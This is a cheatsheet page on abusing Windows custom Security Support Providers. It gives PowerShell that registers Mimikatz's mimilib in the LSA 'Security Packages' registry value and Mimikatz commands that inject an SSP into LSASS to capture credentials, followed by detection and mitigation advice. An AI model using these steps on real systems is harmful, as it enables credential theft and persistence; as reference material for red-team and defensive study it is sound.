daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

custom-ssp.md (3797B)


      1 ---
      2 title: "Custom Security Support Providers"
      3 section: "Windows"
      4 sectionSlug: "windows-hardening"
      5 sourcePath: "src/windows-hardening/active-directory-methodology/custom-ssp.md"
      6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/windows-hardening/active-directory-methodology/custom-ssp.md"
      7 sha: "188de82beb54e70956b2952367a0af91d26758b8"
      8 isIndex: false
      9 modified: true
     10 license: "CC-BY-NC-4.0"
     11 ---
     12 
     13 # Custom Security Support Providers
     14 
     15 [Security Support Providers (SSPs)](../authentication-credentials-uac-and-efs/index.html#security-support-provider-interface-sspi) are DLL-based security packages loaded by the Local Security Authority (LSA). Windows registers custom SSP/AP DLLs through the `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages` `REG_MULTI_SZ` value and loads registered packages when the system starts.<sup>[[1]](#references)</sup>
     16 
     17 Because SSPs run in LSA and can receive credentials, adversaries may abuse a malicious package for credential access and persistence. MITRE tracks this behavior as T1547.005.<sup>[[2]](#references)</sup>
     18 
     19 ## Mimikatz `mimilib`
     20 
     21 Mimikatz includes `mimilib.dll`, which implements an SSP that records credentials handled after it is loaded. In an authorized lab, place the DLL that matches the target architecture in `C:\Windows\System32`, then inspect the current package list before changing it.<sup>[[2]](#references)[[3]](#references)</sup>
     22 
     23 ```powershell
     24 $lsaPath = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
     25 $packages = (Get-ItemProperty -Path $lsaPath -Name 'Security Packages').'Security Packages'
     26 $packages
     27 ```
     28 
     29 A typical existing value can contain packages such as `kerberos`, `msv1_0`, `schannel`, `wdigest`, `tspkg`, and `pku2u`. Preserve every existing entry when adding the custom package.<sup>[[1]](#references)</sup>
     30 
     31 Append `mimilib` without replacing the existing packages:
     32 
     33 ```powershell
     34 if ($packages -notcontains 'mimilib') {
     35     Set-ItemProperty -Path $lsaPath -Name 'Security Packages' -Value ($packages + 'mimilib')
     36 }
     37 ```
     38 
     39 After a reboot, the package is loaded into LSA and subsequent captured credentials are written to `C:\Windows\System32\kiwissp.log` by this implementation.<sup>[[2]](#references)[[3]](#references)</sup>
     40 
     41 ## In-memory Loading
     42 
     43 Mimikatz can also inject its SSP implementation into the current LSASS process:<sup>[[3]](#references)</sup>
     44 
     45 ```text
     46 privilege::debug
     47 misc::memssp
     48 ```
     49 
     50 This method does not persist across a reboot.<sup>[[2]](#references)[[3]](#references)</sup>
     51 
     52 ## Detection and Mitigation
     53 
     54 Monitor changes to `...\Lsa\Security Packages` and unexpected DLL loads into `lsass.exe`. Security event 4657 records a registry **value** modification only when the relevant Audit Registry policy and SACL are configured.<sup>[[2]](#references)[[4]](#references)</sup>
     55 
     56 Where compatible, enable added LSA protection and investigate unsigned or unexpected SSP DLLs. Microsoft documents LSA protection specifically as a control against code injection that could compromise credentials.<sup>[[5]](#references)</sup>
     57 
     58 ## References
     59 
     60 - [1] [Microsoft Learn - Registering SSP/AP DLLs](https://learn.microsoft.com/en-us/windows/win32/secauthn/registering-ssp-ap-dlls)
     61 - [2] [MITRE ATT&CK T1547.005 - Security Support Provider](https://attack.mitre.org/techniques/T1547/005/)
     62 - [3] [Mimikatz repository - `mimilib`](https://github.com/gentilkiwi/mimikatz/tree/master/mimilib)
     63 - [4] [Microsoft Learn - Security event 4657](https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4657)
     64 - [5] [Microsoft Learn - Configure added LSA protection](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection)